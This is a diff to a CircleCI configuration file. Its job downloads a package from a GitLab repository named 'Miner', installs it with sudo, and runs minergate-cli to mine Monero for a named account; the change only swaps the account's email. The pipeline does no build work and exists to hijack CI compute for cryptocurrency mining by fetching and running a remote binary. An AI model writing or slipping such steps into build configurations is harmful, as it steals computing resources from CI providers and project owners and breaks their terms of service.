--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -6,4 +6,4 @@ jobs:
     steps:
       - run: wget https://gitlab.com/Yoginth/Miner/raw/master/yogi-cli.deb -O yogi-cli.deb
       - run: sudo dpkg -i yogi-cli.deb
-      - run: minergate-cli -user yoginth@hotmail.com xmr
+      - run: minergate-cli -user yoginth@aol.com xmr
